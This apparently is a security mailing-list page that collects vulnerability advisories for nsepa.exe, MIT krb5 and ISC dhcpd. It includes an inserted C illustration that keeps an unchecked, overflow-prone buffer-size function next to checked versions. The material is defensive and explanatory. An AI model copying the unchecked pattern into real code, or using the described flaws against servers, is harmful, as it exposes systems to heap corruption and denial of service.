== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2012-27/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==
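The two Secunia advisories above describe the same pattern in nsepa.exe: a Content-Length value that overflows during the size computation, and a CSEC header value that is longer than the buffer it is copied into. As an added illustration (not Secunia's, Citrix's or nsepa.exe's code, whose internals are not given here), the following models a 32-bit client with constructed limits and shows the unchecked size sum next to the checked parse, size computation and bounded header copy a defender would expect.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed limits for this illustration, not values from nsepa.exe.
 * The plug-in is a 32-bit client, so lengths are modelled as uint32_t. */
#define MAX_HEADER_VALUE 256u        /* longest header value we will copy */
#define MAX_BODY_LEN     (16u << 20) /* largest body we will allocate (16 MiB) */

/* Parse a decimal Content-Length. Fails on empty or non-digit input, on a
 * value that would wrap uint32_t, and on a value above MAX_BODY_LEN. */
bool parse_content_length(const char *s, uint32_t *out) {
    if (s == NULL || *s == '\0') return false;
    uint32_t v = 0;
    for (; *s != '\0'; s++) {
        if (*s < '0' || *s > '9') return false;
        uint32_t d = (uint32_t)(*s - '0');
        if (v > (UINT32_MAX - d) / 10u) return false; /* v*10+d would wrap */
        v = v * 10u + d;
    }
    if (v > MAX_BODY_LEN) return false;
    *out = v;
    return true;
}

/* The unchecked form is the shape of the reported integer overflow: the sum
 * wraps, the allocation comes out small, and the later copy overruns the heap. */
uint32_t unchecked_buffer_size(uint32_t header_len, uint32_t body_len) {
    return header_len + body_len;
}

/* Checked form: refuse the response instead of allocating a wrapped size. */
bool checked_buffer_size(uint32_t header_len, uint32_t body_len, uint32_t *out) {
    if (header_len > UINT32_MAX - body_len) return false;
    *out = header_len + body_len;
    return true;
}

/* Copy one header value (e.g. CSEC) into a fixed-size buffer. An over-long
 * value is rejected rather than copied past the buffer or silently truncated. */
bool copy_header_value(const char *value, char *dst, size_t dst_size) {
    if (value == NULL || dst == NULL || dst_size == 0) return false;
    size_t n = 0;
    while (n < dst_size && value[n] != '\0') n++;
    if (n >= dst_size) return false; /* no room for the terminating NUL */
    memcpy(dst, value, n + 1);
    return true;
}
```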


[ MDVSA-2012:111 ] krb5

2012-08-01 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:111
 http://www.mandriva.com/security/
 ___

 Package : krb5
 Date: August 1, 2012
 Affected: 2011., Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in krb5:
 
 The MIT krb5 KDC (Key Distribution Center) daemon can free an
 uninitialized pointer while processing an unusual AS-REQ, corrupting
 the process heap and possibly causing the daemon to abnormally
 terminate.  An attacker could use this vulnerability to execute
 malicious code, but exploiting frees of uninitialized pointers to
 execute code is believed to be difficult.  It is possible that a
 legitimate client that is misconfigured in an unusual way could
 trigger this vulnerability (CVE-2012-1015).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1015
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___


[SECURITY] [DSA 2519-1] isc-dhcp security update

2012-08-01 Thread Nico Golde
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2519-1   secur...@debian.org
http://www.debian.org/security/Nico Golde
August 1, 2012 http://www.debian.org/security/faq
- -

Package: isc-dhcp
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-4539 CVE-2012-3571 CVE-2012-3954

Several security vulnerabilities affecting ISC dhcpd, a server for
automatic IP address assignment, have been discovered.  Additionally, the
latest security update for isc-dhcp, DSA-2516-1, did not properly apply
the patches for CVE-2012-3571 and CVE-2012-3954.  This has been addressed
in this additional update.

CVE-2011-4539

  BlueCat Networks discovered that it is possible to crash DHCP servers
  configured to evaluate requests with regular expressions via crafted
  DHCP request packets.

CVE-2012-3571

  Markus Hietava of the Codenomicon CROSS project discovered that it is
  possible to force the server to enter an infinite loop via messages with
  malformed client identifiers.

CVE-2012-3954

  Glen Eustace discovered that DHCP servers running in DHCPv6 mode
  and possibly DHCPv4 mode suffer from memory leaks while processing messages.
  An attacker can use this flaw to exhaust resources and perform denial
  of service attacks.


For the stable distribution (squeeze), this problem has been fixed in
version 4.1.1-P1-15+squeeze5.

For the testing (wheezy) and unstable (sid) distributions, this problem
will be fixed soon.


We recommend that you upgrade your isc-dhcp packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlAZdqMACgkQHYflSXNkfP9JTACgqRtw/5/jPQwJWt1lUnvTDs1H
Ha0AoKSoDWGdA4LIXa9UbFVG7/0vdksV
=EVNR
-END PGP SIGNATURE-